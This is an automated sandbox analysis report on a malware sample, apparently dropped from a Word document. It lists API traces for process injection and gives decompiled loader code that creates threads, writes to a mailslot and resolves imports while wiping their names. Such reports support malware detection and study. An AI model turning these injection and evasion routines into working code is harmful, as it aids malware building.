    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: apdsroxy.exe Analysis ID: 60981

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:B6EECE7B4FD1B4BD2626AA07E17DA9DE
Total matches:39
Initial Analysis Report:Open
Initial sample Analysis ID:60981
Initial sample SHA 256:93E3B205BA5588173BA0C1C9E6CDD1BABA4EC461E498986DC9851FAC67FA9346
Initial sample name:Request_592655.doc

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
